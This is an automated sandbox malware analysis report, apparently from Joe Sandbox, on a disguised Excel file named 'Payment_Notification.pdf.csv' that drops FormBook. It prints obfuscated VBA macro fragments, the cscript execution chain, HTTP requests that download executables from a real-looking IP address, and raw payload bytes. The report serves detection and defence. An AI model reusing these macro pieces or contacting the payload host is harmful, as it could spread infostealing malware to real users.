Play interactive tourEdit tour

Overview

General Information

 Sample Name: Payment_Notification.pdf.csv MD5: 86a9322007f88be40e4034ebc7368248 SHA1: 522d6e7b2a55e1358072792065219ef71ac8992d SHA256: fdfe1dc9c8056c69e4cb2b5370db0a4c3797b3ad375fe1039a19ce269bbb0c78 Most interesting Screenshot:

Detection

 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected FormBook
Yara detected Generic Dropper
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Sigma detected: Microsoft Office Product Spawning Windows Shell
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\mso8D7C.tmpEXP_potential_CVE_2017_11882unknownReversingLabs
• 0x0:\$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
• 0x580:\$equation1: Equation Native
• 0x8e6:\$cmd: cmd
• 0x912:\$address: 12 0C 43 00
SourceRuleDescriptionAuthorStrings
00000004.00000003.1121140244.0000000006441000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
• 0xd7d8:\$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000004.00000003.1120953960.0000000006457000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
• 0xe020:\$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x157d9:\$sqlite3step: 68 34 1C 7B E1
• 0x158ec:\$sqlite3step: 68 34 1C 7B E1
• 0x15808:\$sqlite3text: 68 38 2A 90 C5
• 0x1592d:\$sqlite3text: 68 38 2A 90 C5
• 0x1581b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x15943:\$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x7248:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x74c2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x12b55:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x12641:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x12c57:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x12dcf:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x804a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x118bc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x89e3:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x17ec7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x18eca:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 4 entries

Sigma Overview

System Summary:

 Sigma detected: Microsoft Office Product Spawning Windows Shell Show sources
 Source: Process started Author: Michael Haag, Florian Roth, Markus Neis: Data: Command: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, CommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' 'C:\Users\user\Desktop\Payment_Notification.pdf.csv', ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 3068, ProcessCommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, ProcessId: 4928

Signature Overview

AV Detection:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY
 Machine Learning detection for sample Show sources
 Source: Payment_Notification.pdf.csv Joe Sandbox ML: detected

Software Vulnerabilities:

 Document exploit detected (process start blacklist hit) Show sources

 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 May 2020 11:47:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 13 May 2020 21:57:20 GMTETag: "15000-5a58eaa05d000"Accept-Ranges: bytesContent-Length: 86016Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 2c a0 d9 53 4d ce 8a 53 4d ce 8a 53 4d ce 8a d0 51 c0 8a 52 4d ce 8a 1c 6f c7 8a 55 4d ce 8a 65 6b c3 8a 52 4d ce 8a 52 69 63 68 53 4d ce 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 95 7e 51 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 01 00 00 20 00 00 00 00 00 00 08 15 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 02 00 07 00 04 00 00 00 00 00 00 00 00 50 01 00 00 10 00 00 13 93 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 22 01 00 28 00 00 00 00 40 01 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 16 01 00 00 10 00 00 00 20 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 28 0c 00 00 00 30 01 00 00 10 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 08 00 00 00 40 01 00 00 10 00 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: GET /stream/tmp.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 5.206.224.171 Source: global traffic HTTP traffic detected: GET /stream/dali.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 5.206.224.171Cache-Control: no-cache
 Connects to IPs without corresponding DNS lookups Show sources
 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171
 Source: global traffic HTTP traffic detected: GET /stream/tmp.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 5.206.224.171 Source: global traffic HTTP traffic detected: GET /stream/dali.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 5.206.224.171Cache-Control: no-cache
 Found strings which match to known social media urls Show sources
 Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp String found in binary or memory: http://www.facebook.com/favicon.ico equals www.facebook.com (Facebook) Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico equals www.myspace.com (Myspace) Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico equals www.rambler.ru (Rambler) Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook) Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/ equals www.rambler.ru (Rambler)
 Urls found in memory or binary data Show sources

E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY

System Summary:

 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000004.00000003.1121140244.0000000006441000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth Source: 00000004.00000003.1120953960.0000000006457000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000003.1121082322.00000000037FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\mso8D7C.tmp, type: DROPPED Matched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
 Document contains an embedded VBA macro which may execute processes Show sources
 Source: Payment_Notification.pdf.csv OLE, VBA macro line: Shell "type NUL > " + TXTFile
 Document contains an embedded VBA macro with suspicious strings Show sources
 Source: Payment_Notification.pdf.csv OLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " sWScript = ""WScript""" + vbCrLf Source: Payment_Notification.pdf.csv OLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " sWScript = sWScript + "".""" + vbCrLf Source: Payment_Notification.pdf.csv OLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " m = sWScript + ""Sh""" + vbCrLf Source: Payment_Notification.pdf.csv OLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " WScript.Echo ""If you don't like toenails, you probably shouldn't look at your feet."" " + vbCrLf Source: Payment_Notification.pdf.csv OLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " Set objHTTP = CreateObject( ""WinHttp.WinHttpRequest.5.1"" )" + vbCrLf
 Document contains an embedded VBA with functions possibly related to ADO stream file operations Show sources
 Microsoft Office drops suspicious files Show sources
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F251746 7_2_1F251746 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1A5790 7_2_1F1A5790 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F242782 7_2_1F242782 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1867D0 7_2_1F1867D0 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F251FCE 7_2_1F251FCE Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B6611 7_2_1F1B6611 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F24CE66 7_2_1F24CE66 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1A7640 7_2_1F1A7640 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B5E70 7_2_1F1B5E70 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B4E61 7_2_1F1B4E61 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F243E96 7_2_1F243E96 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F2526F8 7_2_1F2526F8 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F22C53F 7_2_1F22C53F Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1A1530 7_2_1F1A1530 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F252519 7_2_1F252519 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F241D1B 7_2_1F241D1B Source: C:\ProgramData\tmp.exe Code function: 7_2_1F180D40 7_2_1F180D40 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F24E581 7_2_1F24E581 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F22E58A 7_2_1F22E58A Source: C:\ProgramData\tmp.exe Code function: 7_2_1F231DE3 7_2_1F231DE3 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F24D5D2 7_2_1F24D5D2 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F23FDDB 7_2_1F23FDDB Source: C:\ProgramData\tmp.exe Code function: 7_2_1F23F42B 7_2_1F23F42B Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1A1410 7_2_1F1A1410 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F19740C 7_2_1F19740C Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B547E 7_2_1F1B547E Source: C:\ProgramData\tmp.exe Code function: 7_2_1F243490 7_2_1F243490 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F251C9F 7_2_1F251C9F Source: C:\ProgramData\tmp.exe Code function: 7_2_1F252C9A 7_2_1F252C9A Source: C:\ProgramData\tmp.exe Code function: 7_2_1F2444EF 7_2_1F2444EF Source: C:\ProgramData\tmp.exe Code function: 7_2_1F24DCC5 7_2_1F24DCC5 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1AFB40 7_2_1F1AFB40 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B4B96 7_2_1F1B4B96 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B63C2 7_2_1F1B63C2 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F18EBE0 7_2_1F18EBE0 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F240A02 7_2_1F240A02 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B523D 7_2_1F1B523D Source: C:\ProgramData\tmp.exe Code function: 7_2_1F25E214 7_2_1F25E214 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B4A5B 7_2_1F1B4A5B Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1A42B0 7_2_1F1A42B0 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F251A99 7_2_1F251A99 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F2522DD 7_2_1F2522DD Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B7110 7_2_1F1B7110 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1D9906 7_2_1F1D9906 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B594B 7_2_1F1B594B Source: C:\ProgramData\tmp.exe Code function: 7_2_1F25D9BE 7_2_1F25D9BE Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B6180 7_2_1F1B6180 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F2519E2 7_2_1F2519E2 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F2461DF 7_2_1F2461DF Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B9810 7_2_1F1B9810 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F24D016 7_2_1F24D016 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B0021 7_2_1F1B0021 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1BE020 7_2_1F1BE020 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B1070 7_2_1F1B1070 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F2318B6 7_2_1F2318B6 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F19A080 7_2_1F19A080 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F2528E8 7_2_1F2528E8 Source: C:\ProgramData\tmp.exe Code function: 7_2_1F1B48CB 7_2_1F1B48CB Source: C:\ProgramData\tmp.exe Code function: 7_2_0056076E 7_2_0056076E
 Document contains an embedded VBA macro which executes code when the document is opened / closed Show sources
 Source: Payment_Notification.pdf.csv OLE, VBA macro line: Sub Auto_Open()
 Found potential string decryption / allocating functions Show sources
 Source: C:\ProgramData\tmp.exe Code function: String function: 1F18B0E0 appears 176 times Source: C:\ProgramData\tmp.exe Code function: String function: 1F1DDDE8 appears 48 times Source: C:\ProgramData\tmp.exe Code function: String function: 1F215110 appears 38 times
 Yara signature match Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winCSV@10/12@0/1
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_01
 Creates temporary files Show sources
 Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{DEC44A8B-235A-499E-84E6-942C660EF40C} - OProcSessId.dat Jump to behavior
 Executes visual basic scripts Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
 Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic) Show sources
 Spawns processes Show sources
 Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' 'C:\Users\user\Desktop\Payment_Notification.pdf.csv' Source: unknown Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 Source: unknown Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: unknown Process created: C:\ProgramData\tmp.exe C:\programData\tmp.exe Source: unknown Process created: C:\ProgramData\tmp.exe C:\programData\tmp.exe Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 Jump to behavior Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs Jump to behavior Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\ProgramData\tmp.exe C:\programData\tmp.exe Jump to behavior Source: C:\ProgramData\tmp.exe Process created: C:\ProgramData\tmp.exe C:\programData\tmp.exe Jump to behavior
 Uses an in-process (OLE) Automation server Show sources